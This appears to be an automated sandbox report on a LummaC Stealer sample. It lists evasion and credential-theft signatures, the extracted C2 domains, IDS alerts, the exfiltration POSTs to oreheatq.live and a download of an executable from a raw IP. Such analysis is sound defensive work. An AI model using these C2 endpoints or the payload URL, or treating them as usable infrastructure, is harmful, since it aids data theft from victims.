Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1651717
MD5:	c6889665df5c7a04bacd10f52bf854de
SHA1:	df06bada819d70b38a0e798395bf85a98351f430
SHA256:	548da2333deaf3b2f072afa047dff707e86a3431b730c8a1228b8e50b70ddd0f
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Downloads executable code via HTTP

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

random.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\random.exe" MD5: C6889665DF5C7A04BACD10F52BF854DE)

cleanup

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "wxayfarer.live/ALosnz",
    "oreheatq.live/gsopp",
    "castmaxw.run/ganzde",
    "weldorae.digital/geds",
    "steelixr.live/aguiz",
    "advennture.top/GKsiio",
    "targett.top/dsANGt",
    "smeltingt.run/giiaus",
    "ferromny.digital/gwpd"
  ],
  "Build id": "c813300f762e0f6c907a40e2b329a60536298181e9"
}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-29T14:23:16.235151+0100	2028371	3	Unknown Traffic	192.168.2.7	49681	172.67.172.183	443	TCP
2025-03-29T14:23:17.889266+0100	2028371	3	Unknown Traffic	192.168.2.7	49682	172.67.172.183	443	TCP
2025-03-29T14:23:19.072075+0100	2028371	3	Unknown Traffic	192.168.2.7	49683	172.67.172.183	443	TCP
2025-03-29T14:23:19.999298+0100	2028371	3	Unknown Traffic	192.168.2.7	49684	172.67.172.183	443	TCP
2025-03-29T14:23:21.725803+0100	2028371	3	Unknown Traffic	192.168.2.7	49685	172.67.172.183	443	TCP
2025-03-29T14:23:23.054814+0100	2028371	3	Unknown Traffic	192.168.2.7	49686	172.67.172.183	443	TCP
2025-03-29T14:23:24.951003+0100	2028371	3	Unknown Traffic	192.168.2.7	49687	172.67.172.183	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-29T14:23:16.235151+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49681	172.67.172.183	443	TCP
2025-03-29T14:23:17.889266+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49682	172.67.172.183	443	TCP
2025-03-29T14:23:19.072075+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49683	172.67.172.183	443	TCP
2025-03-29T14:23:19.999298+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49684	172.67.172.183	443	TCP
2025-03-29T14:23:21.725803+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49685	172.67.172.183	443	TCP
2025-03-29T14:23:23.054814+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49686	172.67.172.183	443	TCP
2025-03-29T14:23:24.951003+0100	2061136	1	Domain Observed Used for C2 Detected	192.168.2.7	49687	172.67.172.183	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (oreheatq .live)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-29T14:23:15.860119+0100	2061135	1	Domain Observed Used for C2 Detected	192.168.2.7	55464	1.1.1.1	53	UDP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://oreheatq.live/gsoppQ%	Avira URL Cloud: Label: malware
Source: https://oreheatq.live/gsoppyW	Avira URL Cloud: Label: malware
Source: https://oreheatq.live/gsopp	Avira URL Cloud: Label: malware
Source: https://oreheatq.live/	Avira URL Cloud: Label: malware
Source: https://wxayfarer.live:443/ALosnzsU	Avira URL Cloud: Label: malware
Source: https://oreheatq.live/gsopphW	Avira URL Cloud: Label: malware
Source: https://oreheatq.live:443/gsoppocal	Avira URL Cloud: Label: malware
Source: https://oreheatq.live:443/gsoppR	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["wxayfarer.live/ALosnz", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "c813300f762e0f6c907a40e2b329a60536298181e9"}

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 56%			Perma Link
Source: random.exe	ReversingLabs: Detection: 58%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 81.8%

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wxayfarer.live/ALosnz
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: oreheatq.live/gsopp
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: castmaxw.run/ganzde
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: weldorae.digital/geds
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: steelixr.live/aguiz
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: advennture.top/GKsiio
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: targett.top/dsANGt
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: smeltingt.run/giiaus
Source: 00000000.00000003.930311433.0000000005190000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ferromny.digital/gwpd

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49687 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2061135 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (oreheatq .live) : 192.168.2.7:55464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49686 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49682 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49681 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49683 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49684 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49687 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.7:49685 -> 172.67.172.183:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wxayfarer.live/ALosnz
Source: Malware configuration extractor	URLs: oreheatq.live/gsopp
Source: Malware configuration extractor	URLs: castmaxw.run/ganzde
Source: Malware configuration extractor	URLs: weldorae.digital/geds
Source: Malware configuration extractor	URLs: steelixr.live/aguiz
Source: Malware configuration extractor	URLs: advennture.top/GKsiio
Source: Malware configuration extractor	URLs: targett.top/dsANGt
Source: Malware configuration extractor	URLs: smeltingt.run/giiaus
Source: Malware configuration extractor	URLs: ferromny.digital/gwpd

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 29 Mar 2025 13:23:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 29 Mar 2025 13:18:14 GMTETag: "1c6400-6317b04fd38f9"Accept-Ranges: bytesContent-Length: 1860608Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 21 5d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 1f 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 1e 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 79 68 68 67 7a 78 69 00 50 19 00 00 d0 30 00 00 50 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6b 7a 70 73 6b 70 65 00 10 00 00 00 20 4a 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)/,(,/,),,(,-,-g,Y%,Y,Y.,Rich,PEL#g0J@`J!]@WkD0JJ

Source: global traffic

HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveHost: 176.113.115.7

Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 172.67.172.183:443

Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: oreheatq.live
Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GO9MlvO4InAGhUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14483Host: oreheatq.live
Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=pAGrlEY2fhv27User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15045Host: oreheatq.live
Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n4x183CtEOASUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20365Host: oreheatq.live
Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=zAQUQ5Y2Qd96OWUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2484Host: oreheatq.live
Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=t6t6Cfr5CdhQh28b69QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 549837Host: oreheatq.live
Source: global traffic	HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 89Host: oreheatq.live

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7

Source: global traffic

HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveHost: 176.113.115.7

Source: global traffic	DNS traffic detected: DNS query: wxayfarer.live
Source: global traffic	DNS traffic detected: DNS query: oreheatq.live

Source: unknown

HTTP traffic detected: POST /gsopp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: oreheatq.live

Source: random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/
Source: random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/7_9/
Source: random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535106970.000000000153C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/ranK.$
Source: random.exe, 00000000.00000003.1532699623.0000000001545000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535106970.000000000153C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535128415.0000000001546000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535106970.000000000153C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe1
Source: random.exe, 00000000.00000003.1532638142.000000000155B000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535191209.000000000155D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exeN
Source: random.exe, 00000000.00000003.1532699623.0000000001545000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535128415.0000000001546000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exel
Source: random.exe, 00000000.00000003.1532257234.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1534936154.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7:80/mine/random.exekages
Source: random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.11G
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
